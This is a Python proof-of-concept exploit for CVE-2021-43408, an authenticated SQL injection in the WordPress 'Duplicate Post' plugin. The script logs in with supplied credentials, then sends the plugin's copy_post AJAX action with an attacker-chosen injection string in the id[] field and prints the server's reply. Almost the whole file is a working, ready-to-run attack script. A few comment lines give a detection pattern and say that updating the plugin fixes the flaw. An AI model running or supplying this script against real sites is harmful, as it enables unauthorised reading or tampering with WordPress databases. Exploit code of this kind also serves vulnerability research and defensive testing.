# Proof-of-concept for CVE-2021-43408: an authenticated SQL injection in the
# WordPress "Duplicate Post" plugin, reached through its admin-ajax.php handler.
# Flat script with no main guard, so everything below runs top to bottom at
# import time:
#   1. parse target and credential options from the command line,
#   2. log in to wp-login.php inside a requests.Session so the auth cookies
#      are reused by later requests,
#   3. POST the plugin's "copy_post" AJAX action with the -C value placed
#      verbatim in the id[] form field, and print the raw response body.
# Defender notes: the vulnerable request requires a valid WordPress login, so
# the pattern to alert on is a POST to wp-admin/admin-ajax.php carrying
# action=cdp_action_handling and f=copy_post whose id[] value is not a plain
# post ID; the mitigation is updating the plugin to a fixed release.
# Banner:
banner =  """
                                                            
 ### #   # ####      ###  ##  ### ###          #  ###   #   ##   ### 
##   #   # #           # #  #   #   #         ##    #  ##  #  # #  # 
#     # #  ###         # #  #   #   #         ##  ##   ##  #  #  ##  
#     # #  #    ####  #  #  #  #    #   #### # #    # # #  #  # #### 
##    # #  #         #   #  # #     #        ####   # #### #  # #  # 
 ###   #   ####      ###  ##  ### #####        #  ##    #   ##   ##  
                            
                            [+] Duplicate Post SQL Injection                                                      
"""

# Printed before the imports below are executed; the module runs sequentially.
print(banner)

import argparse
import requests
from datetime import datetime

# User-Input:
# Every option is optional with no default, so an omitted one is None and the
# string concatenation in the URL building below raises TypeError instead of
# producing a usage error.
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Duplicate Post - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)        # target host; also reused as the Host and Origin header values
my_parser.add_argument('-P', '--PORT', type=str)      # target port, kept as a string purely for URL building
my_parser.add_argument('-U', '--PATH', type=str)      # URL prefix spliced verbatim between ':PORT' and 'wp-login.php'; the caller supplies the slashes
my_parser.add_argument('-u', '--USERNAME', type=str)  # WordPress login name, sent as the 'log' form field
my_parser.add_argument('-p', '--PASSWORD', type=str)  # WordPress password, sent as the 'pwd' form field
my_parser.add_argument('-C', '--COMMAND', type=str)   # forwarded unmodified into the id[] field of the AJAX request
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
command = args.COMMAND

print('')
# strftime already returns a str; the str() wrapper is a no-op.
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('')

# Authentication:
# One Session is shared by every request so cookies set by the login are
# carried into the admin-ajax.php call.
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Initial GET of the login page; the response is never inspected (presumably
# only to let WordPress seed its session/test cookies - TODO confirm).
check = session.get(auth_url)
# Header:
# Browser-like request headers for the login POST. Note the User-Agent value
# carries a literal 'User-Agent: ' prefix exactly as written here.
header = {
    'Host': target_ip,
    'User-Agent': 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
# Standard wp-login.php form fields; 'testcookie' mirrors the hidden field the
# login form submits.
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
# No status or redirect check follows, so the script proceeds to the AJAX
# request even when the login failed.
auth = session.post(auth_url, headers=header, data=body)
#print(auth.text)
# Follow-up GET of the post list page; the response is discarded, so this
# does not verify the login either.
check = session.get('http://' + target_ip + ':' + target_port + wp_path+ 'wp-admin/edit.php')
# Exploit:
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'

# Header (Exploit):
# A different User-Agent than the login request. The Referer uses a literal
# '/wordpress/' segment rather than wp_path, so it only matches the target
# when that is the actual install path.
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0',
    'Accept': '*/*',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://' + target_ip + '/wordpress/wp-admin/edit.php',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest',
    'Origin': 'http://' + target_ip,
    'Connection': 'close'
}

# Body (Exploit):
# Form fields of the plugin's copy_post AJAX action. 'id[]' is where the
# plugin expects a post ID and where the -C value is inserted unmodified;
# the remaining data[...] fields are sent with the literal values below.
body = {
    "action": "cdp_action_handling",
    "token": "cdp",
    "f": "copy_post",
    "origin": "tooltip",
    "id[]": command,
    "data[type]": "copy-quick",
    "data[times]": "1",
    "data[site]": "-1",
    "data[profile]": "default",
    "data[swap]": "fals"
}
a = session.post(exploit_url, headers=header, data=body)
# The server's raw reply is the only output; nothing is parsed from it.
print(a.text)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))